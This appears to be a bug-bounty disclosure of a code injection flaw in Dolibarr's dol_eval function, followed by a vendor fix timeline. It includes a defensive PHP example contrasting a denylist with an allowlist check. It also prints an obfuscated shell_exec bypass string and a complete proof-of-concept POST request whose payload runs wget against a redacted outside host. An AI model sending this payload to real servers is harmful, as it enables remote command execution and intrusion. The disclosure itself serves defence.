Code Injection in dolibarr/dolibarr

Valid

Reported on

Feb 28th 2022


Description

Improper sanitization of PHP function names allows an attacker to inject arbitrary PHP code and run arbitrary commands on the file system. In the function "dol_eval" in file "dolibarr/htdocs/core/lib/functions.lib.php", dangerous PHP functions are sanitized using "str_replace", which can be bypassed with the following code in the $s parameter:

('she'.'ll_'.'ex'.'ec')('<ANY SYSTEM SHELL COMMAND HERE>')
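Why a substring denylist fails and what a tighter check looks like, as an added example that is not Dolibarr's own code: the allowlist of identifiers and the exact rejected token classes are assumptions for illustration, not the project's fix.

```php
<?php
// Added example, not Dolibarr's code. Shows why a str_replace denylist on
// function names is bypassable and sketches a token-level check that only
// accepts calls to an explicit allowlist of identifiers.

// Denylist in the spirit of the flaw described above: the concatenated
// payload contains none of the forbidden substrings, so it is left intact.
function denylist_only(string $s): bool {
    $forbidden = ['shell_exec', 'exec', 'system', 'passthru'];
    return $s === str_replace($forbidden, '', $s);
}

// Allowlist-based check (assumed allowlist; adjust to the expressions that
// are actually needed). Any identifier outside it, any variable, eval,
// include, backtick or interpolated string is rejected, and "(" may only
// follow an allowlisted identifier or an opening/operator character, so
// ('she'.'ll_'.'ex'.'ec')(...) and "name"(...) are refused.
function is_safe_expression(string $s): bool {
    $allowed = ['strlen', 'max', 'min', 'true', 'false', 'null'];
    $tokens = token_get_all('<?php ' . $s . ';');
    $prev = null; // previous non-whitespace token
    foreach ($tokens as $t) {
        if (is_array($t)) {
            [$id, $text] = $t;
            if ($id === T_WHITESPACE) {
                continue;
            }
            if ($id === T_STRING && !in_array(strtolower($text), $allowed, true)) {
                return false;
            }
            if (in_array($id, [T_VARIABLE, T_EVAL, T_INCLUDE, T_INCLUDE_ONCE,
                T_REQUIRE, T_REQUIRE_ONCE, T_START_HEREDOC, T_CURLY_OPEN,
                T_DOLLAR_OPEN_CURLY_BRACES], true)) {
                return false;
            }
        } elseif ($t === '`' || $t === '$') {
            return false;
        } elseif ($t === '(') {
            $callee_ok = is_array($prev)
                ? in_array($prev[0], [T_OPEN_TAG, T_STRING], true)
                : ($prev !== ')' && $prev !== ']');
            if (!$callee_ok) {
                return false;
            }
        }
        $prev = $t;
    }
    return true;
}

$payload = "('she'.'ll_'.'ex'.'ec')('<command>')";
var_dump(denylist_only($payload));      // denylist verdict on the concatenated payload
var_dump(is_safe_expression($payload)); // token-level verdict on the same payload
var_dump(is_safe_expression("max(1, strlen('abc'))")); // a benign allowlisted expression
```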

Proof of Concept

A user with rights to add menus to the system can exploit this vulnerability with the following request:

POST /htdocs/admin/menus/edit.php?action=add&token=84da28fc90b6abc2238f2e0da2e5ee10&menuId=0 HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 271
Referer: http://192.168.255.78/dolibarr/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=eldy&backtopage=%2Fdolibarr%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php
Cookie: <COOKIE>
Upgrade-Insecure-Requests: 1

token=84da28fc90b6abc2238f2e0da2e5ee10&menu_handler=all&user=2&type=top&propertymainmenu=testtest&titre=testtest&url=testtest&langs=&position=100&target=&enabled=1&perms=%28%27she%27.%27ll_%27.%27ex%27.%27ec%27%29%28%27wget+https%3A%2F%2F<REDACTED>%27%29&save=Save

Impact

This vulnerability allows running arbitrary commands on the file system.

We are processing your report and will contact the dolibarr team within 24 hours. 3 months ago
We have contacted a member of the dolibarr team and are waiting to hear back 3 months ago
Laurent Destailleur validated this vulnerability 3 months ago
d3addog has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on 2a48dd 3 months ago
Laurent Destailleur has been awarded the fix bounty